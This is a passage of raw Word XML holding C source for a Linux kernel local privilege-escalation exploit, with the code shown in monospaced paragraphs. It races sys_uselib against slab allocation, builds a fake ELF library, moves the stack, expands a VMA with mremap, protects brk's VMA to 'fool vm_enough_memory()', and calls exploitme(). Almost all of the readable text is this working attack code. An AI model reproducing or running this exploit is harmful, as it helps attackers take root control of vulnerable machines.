    <w:p w14:paraId="710D5DD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1==cpid) fatal("clone", 0);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28D6D5CE" w14:textId="77777777" w:rsidR="007A6DCF" w:rsidRPr="007A6DCF" w:rsidRDefault="007A6DCF" w:rsidP="007A6DCF">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="54D516A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ynchronize threads</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DD3D8B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hile(!finish) sys_sched_yield();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="132CE31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inish=0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C105BD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silent) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AA1392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n"); fflush(stdout);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="761B51E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112213F7" w14:textId="77777777" w:rsidR="007A6DCF" w:rsidRPr="007A6DCF" w:rsidRDefault="007A6DCF" w:rsidP="007A6DCF">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6364A6B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try to hit the kmalloc race</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="275DDA2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or(;;) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56880D06" w14:textId="77777777" w:rsidR="007A6DCF" w:rsidRPr="007A6DCF" w:rsidRDefault="007A6DCF" w:rsidP="007A6DCF">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3C6871C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r = get_slab_objs("vm_area_struct");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DE0B30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nfree slab = %d\n",r);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0041236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hile(r != 1 &amp;&amp; r &gt; 0) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DF81D0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prepare_slab();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="127E83F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r--;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A9A5F1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t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F3F01EC" w14:textId="77777777" w:rsidR="007A6DCF" w:rsidRPr="007A6DCF" w:rsidRDefault="007A6DCF" w:rsidP="007A6DCF">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1F398B4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ys_gettimeofday(&amp;tm1, NULL);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DA12D1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go = 1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B4C70D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r=sys_uselib(libname);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E92216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go = 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37184DD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r) fatal("uselib", 0);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A6E769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finish) break;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AC837A7" w14:textId="77777777" w:rsidR="007A6DCF" w:rsidRPr="007A6DCF" w:rsidRDefault="007A6DCF" w:rsidP="007A6DCF">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2E0BCF5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wipe lib VMAs and try again</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="161F30D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r = sys_munmap(lib_addr, LIB_SIZE);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45A1DDA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r) fatal("munmap lib", 0);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DC1544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ccnt) goto failed;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CCB880E" w14:textId="77777777" w:rsidR="007A6DCF" w:rsidRPr="007A6DCF" w:rsidRDefault="007A6DCF" w:rsidP="007A6DCF">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="172F4D9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silent &amp;&amp; !(pcnt%64) ) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CC05EC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printf("\r    Wait... %c", smiley[ (pcnt/64)%8 ]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B01496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fflush(stdout);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B6A662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t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BDD258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cnt++;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DF4A91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6E06DDE5" w14:textId="77777777" w:rsidR="007A6DCF" w:rsidRPr="007A6DCF" w:rsidRDefault="007A6DCF" w:rsidP="007A6DCF">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="187B898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w:t>
      </w:r>
      <w:r w:rsidRPr="007A6DCF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
        <w:t>seems we raced, free mem</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5658237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sys_munmap(map_addr, map_base-map_addr + PAGE_SIZE);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E5545C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r) fatal("munmap 1", 0);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7862A9F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sys_munmap(lib_addr, PAGE_SIZE);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C1EB42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r) fatal("munmap 2", 0);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40F1428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p>
    <w:p w14:paraId="0293496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relax kswapd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6774E6D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ys_gettimeofday(&amp;tm1, NULL);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AC9875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or(;;) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7059603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ys_sched_yield();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FCD928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ys_gettimeofday(&amp;tm2, NULL);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C7BD9E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delta = tmdiff(&amp;tm1, &amp;tm2);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="366352F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wtime*1000000U &lt;= (unsigned)delta ) break;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B73156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2909601F" w14:textId="77777777" w:rsidR="007A6DCF" w:rsidRPr="007A6DCF" w:rsidRDefault="007A6DCF" w:rsidP="007A6DCF">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="67B94C3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we need to check the PROT_EXEC flag</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AADDAB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p_flags = PROT_EXEC;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AAC2DD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heck_vma_flags();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A67740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map_flags) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DDA67F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rintf("\n    VMAs reversed"); fflush(stdout);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ED23BA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62474ADC" w14:textId="77777777" w:rsidR="007A6DCF" w:rsidRPr="007A6DCF" w:rsidRDefault="007A6DCF" w:rsidP="007A6DCF">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="640FC7F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write protect brk's VMA to fool vm_enough_memory()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C782E9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sys_mprotect((lib_addr + PAGE_SIZE), LIB_SIZE-PAGE_SIZE,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39A0567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 xml:space="preserve"> PROT_READ|map_flags);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5721AD2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1==r) { fatal("mprotect brk", 0); }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41FCAB87" w14:textId="77777777" w:rsidR="007A6DCF" w:rsidRPr="007A6DCF" w:rsidRDefault="007A6DCF" w:rsidP="007A6DCF">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="154D254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this will finally make the big VMA...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B9BAFF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z = (0-lib_addr) - LIB_SIZE - PAGE_SIZE;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EBB7AA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expand:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="695CB77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sys_madvise((void*)(lib_addr + PAGE_SIZE),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24F78B4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LIB_SIZE-PAGE_SIZE, MADV_NORMAL);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47A5FE7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r) fatal("madvise", 0);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46205B3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sys_mremap(lib_addr + LIB_SIZE-PAGE_SIZE,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="625774F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PAGE_SIZE, sz, MREMAP_MAYMOVE, 0);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="502E0AF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1==r) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1168195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0==sz) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61A04C5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fatal("mremap: expand VMA", 0);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D9D482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 else {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75E5A98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sz -= PAGE_SIZE;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06A5841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goto expand;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16C8934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t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27C63A5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7AB8327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ma_start = lib_addr + PAGE_SIZE;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0775789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vma_end = vma_start + sz + 2*PAGE_SIZE;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40A025E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    expanded VMA (0x%.8x-0x%.8x)", vma_start, vma_end);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AD9E73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flush(stdout);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="748888A3" w14:textId="77777777" w:rsidR="007A6DCF" w:rsidRPr="007A6DCF" w:rsidRDefault="007A6DCF" w:rsidP="007A6DCF">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="34EEDCF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try to figure kernel layout</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AA08E7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gnal(SIGCHLD, reaper);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C86E3D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gnal(SIGSEGV, segvcnt);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DDFA32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gnal(SIGBUS, segvcnt);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7783905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can_mm_start();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D44829E" w14:textId="77777777" w:rsidR="007A6DCF" w:rsidRPr="007A6DCF" w:rsidRDefault="007A6DCF" w:rsidP="007A6DCF">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="18539F5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failed:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B15CD4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ab/>
        <w:t>printf("failed:\n");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E71583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atal("try again", 0);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D510E25" w14:textId="77777777" w:rsidR="007A6DCF" w:rsidRPr="007A6DCF" w:rsidRDefault="007A6DCF" w:rsidP="007A6DCF">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="799859B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64B684C4" w14:textId="77777777" w:rsidR="007A6DCF" w:rsidRPr="007A6DCF" w:rsidRDefault="007A6DCF" w:rsidP="007A6DCF">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="49103163" w14:textId="77777777" w:rsidR="007A6DCF" w:rsidRPr="007A6DCF" w:rsidRDefault="007A6DCF" w:rsidP="007A6DCF">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0D43892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make fake ELF library</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72F2072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make_lib()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A09E09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7F94D1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ruct elfhdr eh;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="320EE4C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ruct elf_phdr eph;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="006AE74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char tmpbuf[PAGE_SIZE];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="203771D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fd;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A17709F" w14:textId="77777777" w:rsidR="007A6DCF" w:rsidRPr="007A6DCF" w:rsidRDefault="007A6DCF" w:rsidP="007A6DCF">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="40483A1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make our elf library</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DEA9BD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umask(022);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C69E19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unlink(libname);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2500778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d=open(libname, O_RDWR|O_CREAT|O_TRUNC, 0755);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DF68B2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fd&lt;0) fatal("open lib ("LIBNAME" not writable?)", 0);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16451C7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emset(&amp;eh, 0, sizeof(eh) );</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74624ED5" w14:textId="77777777" w:rsidR="007A6DCF" w:rsidRPr="007A6DCF" w:rsidRDefault="007A6DCF" w:rsidP="007A6DCF">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7A772B6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elf exec header</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48C8E92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emcpy(eh.e_ident, ELFMAG, SELFMAG);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EA57C2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h.e_type = ET_EXEC;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D99794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h.e_machine = EM_386;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53CD813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h.e_phentsize = sizeof(struct elf_phdr);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DE2E33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h.e_phnum = 1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54336C5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h.e_phoff = sizeof(eh);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53D09B7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rite(fd, &amp;eh, sizeof(eh) );</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04E8740E" w14:textId="77777777" w:rsidR="007A6DCF" w:rsidRPr="007A6DCF" w:rsidRDefault="007A6DCF" w:rsidP="007A6DCF">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="64B8F86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ection header:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="271F686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emset(&amp;eph, 0, sizeof(eph) );</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AF52C7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ph.p_type = PT_LOAD;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AB753B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ph.p_offset = 4096;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5612FA1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ph.p_filesz = 4096;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3110BB5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ph.p_vaddr = lib_addr;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69F0C06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ph.p_memsz = LIB_SIZE;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5412965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ph.p_flags = PF_W|PF_R|PF_X;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="681EA72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rite(fd, &amp;eph, sizeof(eph) );</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AFE6BCF" w14:textId="77777777" w:rsidR="007A6DCF" w:rsidRPr="007A6DCF" w:rsidRDefault="007A6DCF" w:rsidP="007A6DCF">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0D7AE7B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execable code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F178F7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lseek(fd, 4096, SEEK_SET);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05E7FFC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emset(tmpbuf, 0x90, sizeof(tmpbuf) );</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="304D5C6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rite(fd, &amp;tmpbuf, sizeof(tmpbuf) );</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22DF8C3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lose(fd);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7513639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03E15003" w14:textId="77777777" w:rsidR="007A6DCF" w:rsidRPr="007A6DCF" w:rsidRDefault="007A6DCF" w:rsidP="007A6DCF">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="75C72BA0" w14:textId="77777777" w:rsidR="007A6DCF" w:rsidRPr="007A6DCF" w:rsidRDefault="007A6DCF" w:rsidP="007A6DCF">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="74E17D3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move stack down #2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="098E0DB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prepare_finish()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29AFD6E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59D43E1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r;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E5E36C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static struct sysinfo si;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F68E60F" w14:textId="77777777" w:rsidR="007A6DCF" w:rsidRPr="007A6DCF" w:rsidRDefault="007A6DCF" w:rsidP="007A6DCF">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="364E9EE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old_esp &amp;= ~(PAGE_SIZE-1);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0132A20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ab/>
        <w:t>old_esp -= PAGE_SIZE;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E7F343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task_size = ((unsigned)old_esp + 1 GB ) / (1 GB) * 1 GB;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4103395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r = sys_munmap(old_esp, task_size-old_esp);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33BB7A4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r) fatal("unmap stack", 0);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A4F232D" w14:textId="77777777" w:rsidR="007A6DCF" w:rsidRPr="007A6DCF" w:rsidRDefault="007A6DCF" w:rsidP="007A6DCF">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="09055B5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setup rt env</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D8D612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uid = getuid();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23D52BD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lib_addr = task_size - LIB_SIZE - PAGE_SIZE;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4400086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map_base)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="504E8EA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map_addr = map_base;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70C3DB4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lse</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24C05CF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map_base = map_addr = (lib_addr - PGD_SIZE) &amp; ~(PGD_SIZE-1);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02BAE9F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 moved stack %x, task_size=0x%.8x, map_base=0x%.8x",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57AE5CB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old_esp, task_size, map_base); fflush(stdout);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57284E06" w14:textId="77777777" w:rsidR="007A6DCF" w:rsidRPr="007A6DCF" w:rsidRDefault="007A6DCF" w:rsidP="007A6DCF">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="40460FB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check physical mem &amp; prepare</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AD61A5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ysinfo(&amp;si);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62BDC8F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addr_min = task_size + si.totalram;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25D440A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addr_min = (addr_min + PGD_SIZE - 1) &amp; ~(PGD_SIZE-1);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AC1A0C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addr_max = addr_min + si.totalram;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51420F7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unsigned)addr_max &gt;= 0xffffe000 || (unsigned)addr_max &lt; (unsigned)addr_min)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E5931C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addr_max = 0xffffd000;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ED6C946" w14:textId="77777777" w:rsidR="007A6DCF" w:rsidRPr="007A6DCF" w:rsidRDefault="007A6DCF" w:rsidP="007A6DCF">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="40F46E8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 vmalloc area 0x%.8x - 0x%.8x", addr_min, addr_max);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C41F54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x_page = (addr_max - addr_min) / PAGE_SIZE;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="096ABD3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agemap = malloc( max_page + 32 );</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EEACC5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pagemap) fatal("malloc pagemap", 1);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70ACFC4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emset(pagemap, 0, max_page + 32);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3756A96D" w14:textId="77777777" w:rsidR="007A6DCF" w:rsidRPr="007A6DCF" w:rsidRDefault="007A6DCF" w:rsidP="007A6DCF">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="12AE83A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go go</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BFD7B5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make_lib();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5671214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xploitme();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D17745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7D81B7C" w14:textId="77777777" w:rsidR="007A6DCF" w:rsidRPr="007A6DCF" w:rsidRDefault="007A6DCF" w:rsidP="007A6DCF">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="58A315A6" w14:textId="77777777" w:rsidR="007A6DCF" w:rsidRPr="007A6DCF" w:rsidRDefault="007A6DCF" w:rsidP="007A6DCF">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0382649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move stack down #1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C599BD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prepare()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54BB8C2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39FC64D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unsigned p=0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22B69B67" w14:textId="77777777" w:rsidR="007A6DCF" w:rsidRPr="007A6DCF" w:rsidRDefault="007A6DCF" w:rsidP="007A6DCF">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5274707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environ = myenv;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="580B9252" w14:textId="77777777" w:rsidR="007A6DCF" w:rsidRPr="007A6DCF" w:rsidRDefault="007A6DCF" w:rsidP="007A6DCF">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
